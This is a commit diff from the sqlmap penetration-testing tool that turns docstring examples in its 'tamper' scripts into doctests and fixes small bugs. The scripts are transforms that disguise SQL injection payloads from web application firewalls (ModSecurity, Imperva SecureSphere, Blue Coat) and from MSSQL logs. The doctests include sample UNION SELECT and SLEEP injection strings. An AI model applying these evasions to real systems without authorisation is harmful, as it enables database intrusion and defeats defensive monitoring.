sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 01:26:42 +03:00
Code Issues Packages Projects Releases Wiki Activity

Another update for an Issue #352 and couple of fixes

Browse Source
This commit is contained in:
Miroslav Stampar 2013-03-13 21:57:09 +01:00
parent b35122a42c
commit 4cb378ce3e
38 changed files with 127 additions and 146 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/core/common.py
View File

@ -736,7 +736,7 @@ def singleTimeLogMessage(message, level=logging.INFO, flag=None):
if flag is None:
flag = hash(message)
if flag not in kb.singleLogFlags:
if not conf.smokeTest and flag not in kb.singleLogFlags:
kb.singleLogFlags.add(flag)
logger.log(level, message)

6
lib/core/testing.py
View File

@ -41,8 +41,9 @@ failedTraceBack = None
def smokeTest():
"""
This will run the basic smoke testing of a program
Runs the basic smoke testing of a program
"""
retVal = True
count, length = 0, 0
@ -106,8 +107,9 @@ def adjustValueType(tagName, value):
def liveTest():
"""
This will run the test of a program against the live testing environment
Runs the test of a program against the live testing environment
"""
global failedItem
global failedParseOn
global failedTraceBack

7
tamper/apostrophemask.py
View File

@ -16,15 +16,14 @@ def tamper(payload, **kwargs):
"""
Replaces apostrophe character with its UTF-8 full width counterpart
Example:
* Input: AND '1'='1'
* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
References:
* http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
* http://lukasz.pilorz.net/testy/unicode_conversion/
* http://sla.ckers.org/forum/read.php?13,11562,11850
* http://lukasz.pilorz.net/testy/full_width_utf/index.phps
>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
"""
return payload.replace('\'', "%EF%BC%87") if payload else payload

5
tamper/apostrophenullencode.py
View File

@ -16,9 +16,8 @@ def tamper(payload, **kwargs):
"""
Replaces apostrophe character with its illegal double unicode counterpart
Example:
* Input: AND '1'='1'
* Output: AND %00%271%00%27=%00%271%00%27
>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
"""
return payload.replace('\'', "%00%27") if payload else payload

7
tamper/appendnullbyte.py
View File

@ -16,10 +16,6 @@ def tamper(payload, **kwargs):
"""
Appends encoded NULL byte character at the end of payload
Example:
* Input: AND 1=1
* Output: AND 1=1%00
Requirement:
* Microsoft Access
@ -29,6 +25,9 @@ def tamper(payload, **kwargs):
also possible
Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection
>>> tamper('1 AND 1=1')
'1 AND 1=1%00'
"""
return "%s%%00" % payload if payload else payload

5
tamper/base64encode.py
View File

@ -18,9 +18,8 @@ def tamper(payload, **kwargs):
"""
Base64 all characters in a given payload
Example:
* Input: 1' AND SLEEP(5)#
* Output: MScgQU5EIFNMRUVQKDUpIw==
>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
"""
return base64.b64encode(payload) if payload else payload

7
tamper/between.py
View File

@ -18,10 +18,6 @@ def tamper(payload, **kwargs):
"""
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
Example:
* Input: 'A > B'
* Output: 'A NOT BETWEEN 0 AND B'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -33,6 +29,9 @@ def tamper(payload, **kwargs):
filter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script
should work against all (?) databases
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
"""
retVal = payload

9
tamper/bluecoat.py
View File

@ -19,10 +19,6 @@ def tamper(payload, **kwargs):
Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operator
Example:
* Input: SELECT id FROM users where id = 1
* Output: SELECT%09id FROM users where id LIKE 1
Requirement:
* Blue Coat SGOS with WAF activated as documented in
https://kb.bluecoat.com/index?page=content&id=FAQ2147
@ -32,12 +28,15 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass Blue Coat's recommended WAF rule configuration
>>> tamper('SELECT id FROM users where id = 1')
'SELECT%09id FROM users where id LIKE 1'
"""
retVal = payload
if payload:
retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload)
retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>%09", payload)
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
return retVal

9
tamper/chardoubleencode.py
View File

@ -19,14 +19,13 @@ def tamper(payload, **kwargs):
Double url-encodes all characters in a given payload (not processing
already encoded)
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
Notes:
* Useful to bypass some weak web application firewalls that do not
double url-decode the request before processing it through their
ruleset
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
"""
retVal = payload
@ -37,7 +36,7 @@ def tamper(payload, **kwargs):
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += payload[i:i + 3]
retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%25%.2X' % ord(payload[i])

7
tamper/charencode.py
View File

@ -19,10 +19,6 @@ def tamper(payload, **kwargs):
Url-encodes all characters in a given payload (not processing already
encoded)
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -34,6 +30,9 @@ def tamper(payload, **kwargs):
url-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind,
hence it should work against any DBMS
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
"""
retVal = payload

7
tamper/charunicodeencode.py
View File

@ -21,10 +21,6 @@ def tamper(payload, **kwargs):
Unicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)
Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
Requirement:
* ASP
* ASP.NET
@ -39,6 +35,9 @@ def tamper(payload, **kwargs):
* Useful to bypass weak web application firewalls that do not
unicode url-decode the request before processing it through their
ruleset
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
"""
retVal = payload

7
tamper/equaltolike.py
View File

@ -21,10 +21,6 @@ def tamper(payload, **kwargs):
"""
Replaces all occurances of operator equal ('=') with operator 'LIKE'
Example:
* Input: SELECT * FROM users WHERE id=1
* Output: SELECT * FROM users WHERE id LIKE 1
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -34,6 +30,9 @@ def tamper(payload, **kwargs):
filter the equal character ('=')
* The LIKE operator is SQL standard. Hence, this tamper script
should work against all (?) databases
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
"""
def process(match):

7
tamper/greatest.py
View File

@ -18,10 +18,6 @@ def tamper(payload, **kwargs):
"""
Replaces greater than operator ('>') with 'GREATEST' counterpart
Example:
* Input: 'A > B'
* Output: 'GREATEST(A, B + 1) = A'
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
@ -32,6 +28,9 @@ def tamper(payload, **kwargs):
filter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databases
>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
"""
retVal = payload

7
tamper/halfversionedmorekeywords.py
View File

@ -23,10 +23,6 @@ def tamper(payload, **kwargs):
"""
Adds versioned MySQL comment before each keyword
Example:
* Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
* Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Requirement:
* MySQL < 5.1
@ -38,6 +34,9 @@ def tamper(payload, **kwargs):
back-end database management system is MySQL
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
"""
def process(match):

9
tamper/ifnull2ifisnull.py
View File

@ -16,10 +16,6 @@ def tamper(payload, **kwargs):
"""
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
Example:
* Input: IFNULL(1, 2)
* Output: IF(ISNULL(1), 2, 1)
Requirement:
* MySQL
* SQLite (possibly)
@ -31,6 +27,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that filter the IFNULL() function
>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
"""
if payload and payload.find("IFNULL") > -1:
@ -55,7 +54,7 @@ def tamper(payload, **kwargs):
if comma and end:
_ = payload[index + len("IFNULL("):comma]
__ = payload[comma + 1:end]
__ = payload[comma + 1:end].lstrip()
newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _)
payload = payload[:index] + newVal + payload[end + 1:]
else:

9
tamper/modsecurityversioned.py
View File

@ -17,10 +17,6 @@ def tamper(payload, **kwargs):
"""
Embraces complete query with versioned comment
Example:
* Input: 1 AND 2>1--
* Output: 1 /*!30000AND 2>1*/--
Requirement:
* MySQL
@ -29,6 +25,11 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass ModSecurity WAF/IDS
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'
"""
retVal = payload

7
tamper/modsecurityzeroversioned.py
View File

@ -16,10 +16,6 @@ def tamper(payload, **kwargs):
"""
Embraces complete query with zero-versioned comment
Example:
* Input: 1 AND 2>1--
* Output: 1 /*!00000AND 2>1*/--
Requirement:
* MySQL
@ -28,6 +24,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass ModSecurity WAF/IDS
>>> tamper('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
"""
retVal = payload

8
tamper/multiplespaces.py
View File

@ -20,15 +20,15 @@ def tamper(payload, **kwargs):
"""
Adds multiple spaces around SQL keywords
Example:
* Input: UNION SELECT
* Output: UNION SELECT
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar'
"""
retVal = payload

8
tamper/nonrecursivereplacement.py
View File

@ -18,12 +18,12 @@ def tamper(payload, **kwargs):
Replaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace("SELECT", "")) filters
Example:
* Input: 1 UNION SELECT 2--
* Output: 1 UNUNIONION SELSELECTECT 2--
Notes:
* Useful to bypass very weak custom filters
>>> random.seed(0)
>>> tamper('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
"""
keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE")

7
tamper/percentage.py
View File

@ -20,10 +20,6 @@ def tamper(payload, **kwargs):
"""
Adds a percentage sign ('%') infront of each character
Example:
* Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Requirement:
* ASP
@ -34,6 +30,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
"""
if payload:

9
tamper/randomcase.py
View File

@ -20,10 +20,6 @@ def tamper(payload, **kwargs):
"""
Replaces each keyword character with random case value
Example:
* Input: INSERT
* Output: InsERt
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -34,6 +30,11 @@ def tamper(payload, **kwargs):
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'INseRt'
"""
retVal = payload

6
tamper/randomcomments.py
View File

@ -16,7 +16,11 @@ __priority__ = PRIORITY.LOW
def tamper(payload, **kwargs):
"""
Add random comments to SQL keywords
Example: 'INSERT' becomes 'IN/**/S/**/ERT'
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/N/**/SERT'
"""
retVal = payload

7
tamper/securesphere.py
View File

@ -16,13 +16,12 @@ def tamper(payload, **kwargs):
"""
Appends special crafted string
Example:
* Input: AND 1=1
* Output: AND 1=1 and '0having'='0having'
Notes:
* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163
>>> tamper('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
"""
return payload + " and '0having'='0having'" if payload else payload

7
tamper/sp_password.py
View File

@ -13,16 +13,15 @@ def tamper(payload, **kwargs):
"""
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
Example:
* Input: 1 AND 9227=9227--
* Output: 1 AND 9227=9227--sp_password
Requirement:
* MSSQL
Notes:
* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
* Reference: http://websec.ca/kb/sql_injection
>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
"""
retVal = ""

7
tamper/space2comment.py
View File

@ -16,10 +16,6 @@ def tamper(payload, **kwargs):
"""
Replaces space character (' ') with comments '/**/'
Example:
* Input: SELECT id FROM users
* Output: SELECT/**/id/**/FROM/**/users
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -28,6 +24,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
"""
retVal = payload

10
tamper/space2dash.py
View File

@ -17,20 +17,18 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a dash comment ('--') followed by
a random string and a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
Requirement:
* MSSQL
* SQLite
Tested against:
Notes:
* Useful to bypass several web application firewalls
* Used during the ZeroNights SQL injection challenge,
https://proton.onsec.ru/contest/
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
"""
retVal = ""

8
tamper/space2hash.py
View File

@ -23,10 +23,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a pound character ('#') followed by
a random string and a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Requirement:
* MySQL
@ -37,6 +33,10 @@ def tamper(payload, **kwargs):
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
"""
retVal = ""

8
tamper/space2morehash.py
View File

@ -26,10 +26,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a pound character ('#') followed by
a random string and a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Requirement:
* MySQL >= 5.1.13
@ -40,6 +36,10 @@ def tamper(payload, **kwargs):
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
"""
def process(match):

8
tamper/space2mssqlblank.py
View File

@ -22,10 +22,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a random blank character from a
valid set of alternate characters
Example:
* Input: SELECT id FROM users
* Output: SELECT%08id%02FROM%0Fusers
Requirement:
* Microsoft SQL Server
@ -35,6 +31,10 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Eid%0DFROM%07users'
"""
# ASCII table:

7
tamper/space2mssqlhash.py
View File

@ -14,16 +14,15 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a pound character ('#') followed by
a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1%23%0A9227=9227
Requirement:
* MSSQL
* MySQL
Notes:
* Useful to bypass several web application firewalls
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
"""
retVal = ""

8
tamper/space2mysqlblank.py
View File

@ -22,10 +22,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a random blank character from a
valid set of alternate characters
Example:
* Input: SELECT id FROM users
* Output: SELECT%0Bid%0BFROM%A0users
Requirement:
* MySQL
@ -34,6 +30,10 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0BFROM%0Cusers'
"""
# ASCII table:

7
tamper/space2mysqldash.py
View File

@ -21,10 +21,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a dash comment ('--') followed by
a new line ('\n')
Example:
* Input: 1 AND 9227=9227
* Output: 1--%0AAND--%0A9227=9227
Requirement:
* MySQL
* MSSQL
@ -33,6 +29,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls.
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
"""
retVal = ""

7
tamper/space2plus.py
View File

@ -16,14 +16,13 @@ def tamper(payload, **kwargs):
"""
Replaces space character (' ') with plus ('+')
Example:
* Input: SELECT id FROM users
* Output: SELECT+id+FROM+users
Notes:
* Is this any useful? The plus get's url-encoded by sqlmap engine
invalidating the query afterwards
* This tamper script works against all databases
>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
"""
retVal = payload

8
tamper/space2randomblank.py
View File

@ -19,10 +19,6 @@ def tamper(payload, **kwargs):
Replaces space character (' ') with a random blank character from a
valid set of alternate characters
Example:
* Input: SELECT id FROM users
* Output: SELECT\rid\tFROM\nusers
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
@ -31,6 +27,10 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
"""
# ASCII table:

5
tamper/unionalltounion.py
View File

@ -16,9 +16,8 @@ def tamper(payload, **kwargs):
"""
Replaces UNION ALL SELECT with UNION SELECT
Example:
* Input: -1 UNION ALL SELECT
* Output: -1 UNION SELECT
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
"""
return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload

7
tamper/unmagicquotes.py
View File

@ -19,15 +19,14 @@ def tamper(payload, **kwargs):
Replaces quote character (') with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)
Example:
* Input: 1' AND 1=1
* Output: 1%bf%27 AND 1=1--%20
Notes:
* Useful for bypassing magic_quotes/addslashes feature
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
>>> tamper("1' AND 1=1")
'1%bf%27 AND 1=1-- '
"""
retVal = payload

7
tamper/versionedkeywords.py
View File

@ -22,10 +22,6 @@ def tamper(payload, **kwargs):
"""
Encloses each non-function keyword with versioned MySQL comment
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
Requirement:
* MySQL
@ -35,6 +31,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
"""
def process(match):

7
tamper/versionedmorekeywords.py
View File

@ -23,10 +23,6 @@ def tamper(payload, **kwargs):
"""
Encloses each keyword with versioned MySQL comment
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Requirement:
* MySQL >= 5.1.13
@ -36,6 +32,9 @@ def tamper(payload, **kwargs):
Notes:
* Useful to bypass several web application firewalls when the
back-end database management system is MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
"""
def process(match):